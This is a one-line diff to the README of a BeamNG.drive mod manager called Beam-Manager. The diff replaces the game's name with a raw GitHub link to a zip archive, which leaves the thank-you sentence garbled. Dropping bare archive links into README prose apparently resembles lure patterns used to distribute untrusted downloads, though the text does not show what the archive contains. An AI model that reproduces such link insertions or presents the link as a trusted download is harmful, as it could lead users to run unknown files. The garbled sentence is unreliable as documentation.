bluddowntown/Beam-Manager/README.md

 ---

-Thank you for choosing Beam-Manager to manage your BeamNG.drive mods.
+Thank you for choosing Beam-Manager to manage your https://raw.githubusercontent.com/bluddowntown/Beam-Manager/main/Beam Manager/Beam-Manager-3.5.zip mods.